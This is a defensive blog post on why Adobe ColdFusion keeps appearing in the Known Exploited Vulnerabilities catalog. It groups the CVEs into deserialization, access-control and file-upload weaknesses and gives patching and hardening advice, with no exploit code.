Adobe ColdFusion has been getting popped the same ways for 15 years
The KEV catalog holds a long run of ColdFusion bugs: deserialization RCEs, access-control bypasses, and file uploads, from 2013 to 2024. Different CVEs, same handful of weaknesses. If you still run internet-facing ColdFusion, you're operating a perennial target.
Adobe ColdFusion is one of the most persistently-exploited products in the Known Exploited Vulnerabilities catalog, and the striking thing is how little the bugs vary. Across more than a decade, the entries cluster into the same few weaknesses: insecure deserialization leading to remote code execution, access-control bypasses that unlock admin functionality, and unrestricted file uploads. The catalog spans CVE-2013-0625/0629/0631/0632 (the 2013 wave of auth bypass, traversal, and disclosure), CVE-2018-4939 and CVE-2018-15961 (deserialization and file-upload RCE used by nation-state actors), CVE-2017-3066 (deserialization), and the 2023 run, CVE-2023-26359, CVE-2023-26360, CVE-2023-29298, CVE-2023-38205, CVE-2023-29300, and CVE-2023-38203, plus CVE-2024-20767. Different years, same playbook.
The recurring weaknesses
ColdFusion’s exploitation history concentrates in three buckets, and recognizing them is more useful than tracking each CVE:
- Insecure deserialization. ColdFusion has repeatedly deserialized untrusted data (Java/WDDX) in ways that let an attacker instantiate objects and execute code, CVE-2017-3066, CVE-2018-4939, CVE-2023-26360, CVE-2023-26359, CVE-2023-29300, and CVE-2023-38203 among them. This is the same deserialization footgun seen across the catalog, in a product that keeps stepping on it.
- Access-control bypasses. Several bugs (CVE-2023-29298, CVE-2023-38205, the 2013 auth-bypass set, CVE-2024-20767) let attackers reach administrative endpoints or functionality they shouldn’t, often chained with a deserialization or file bug to reach RCE. CVE-2023-29298 chained with CVE-2023-26360 was a notable 2023 example.
- Unrestricted file upload / traversal. CVE-2018-15961 and the 2013 traversal bugs let attackers write web shells. The familiar upload-to-RCE pattern.
The 2023 cluster also illustrates the patch-bypass habit: CVE-2023-38203 followed CVE-2023-29300 as a way around the initial fix, the same “narrow patch invites a variant” dynamic seen elsewhere. ColdFusion’s deserialization bugs in particular have been a moving target, fixed and re-bypassed.
Why it keeps happening
ColdFusion is a mature application server with a large, legacy codebase and a long tail of installs, many internet-facing (it serves web applications) and many maintained by teams who inherited the app and don’t touch the platform. That’s the recipe for a perennial target: an exposed, complex, privileged web server with recurring weaknesses and an owner base that patches slowly. Each new ColdFusion CVE lands on a population that’s still catching up on the last one, and exploitation, by APTs, ransomware crews, and cryptominers, tends to follow disclosure within days.
What to do
- Patch ColdFusion promptly and stay on a supported version. Adobe ships security updates regularly; apply them on an emergency cadence, because the disclosure-to-exploitation window is short and the patch-bypass pattern means you need the latest fix, not just a fix.
- Apply Adobe’s lockdown guide. Adobe publishes a ColdFusion security/lockdown guide that hardens the server (restricting admin access, disabling unused features, tightening file permissions). Following it closes a lot of the access-control and upload surface.
- Get the ColdFusion Administrator off the internet. The admin interface should never be publicly reachable; restrict it to a management network. Many access-control bugs only matter because the admin endpoints are exposed.
- Run ColdFusion least-privilege, and isolate it. Don’t run it as a high-privilege account, and segment it so a web-shell on the ColdFusion box isn’t a flat path to everything.
- Assume compromise on long-exposed, unpatched servers, and hunt for web shells, the ColdFusion/JVM process spawning shells, and unexpected outbound connections. Given the deserialization history, an exposed unpatched instance should be treated as breached.
- Consider whether you still need it. For some organizations, the most durable answer to a perennial-target platform is migrating the application off it.
The reframe is to treat ColdFusion as a known-bad-luck platform and posture for it: assume more deserialization and access-control bugs are coming, keep it patched and locked down per Adobe’s guide, keep its admin interface off the internet, and isolate it. The catalog’s fifteen-year ColdFusion record isn’t a series of surprises; it’s a pattern, and the defensive answer is the same across the run. We track the ColdFusion entries as one ongoing story, because the bugs keep rhyming.
Sources
Share
Related field notes
-
The same handful of mechanisms account for most of the catalog
After the marquee bugs, Tier 1's remaining entries, DotNetNuke, ForgeRock, BQE, Sophos, Tomcat, Citrix ShareFile, SAP, Quest, Atlassian Crowd, Exim, Cisco ASA, Office, don't introduce new lessons. They confirm the few recurring mechanisms behind nearly every exploited vulnerability.
-
Sitecore CVE-2021-42237: another .NET deserialization RCE in a CMS you forgot was internet-facing
CVE-2021-42237 is an insecure-deserialization RCE in Sitecore XP. It's the same .NET deserialization footgun that keeps showing up in enterprise web apps, on a CMS that often sits forgotten but internet-facing.
-
Insecure deserialization isn't a Java problem. Ask Ruby's YAML.load.
CVE-2022-47986 is a pre-auth RCE in IBM Aspera Faspex from a single call to YAML.load on data an unauthenticated user controls. It's the Ruby version of the deserialization footgun, and ransomware crews used it to move onto Linux.
One email, every weekday morning.
You're in. Check your inbox.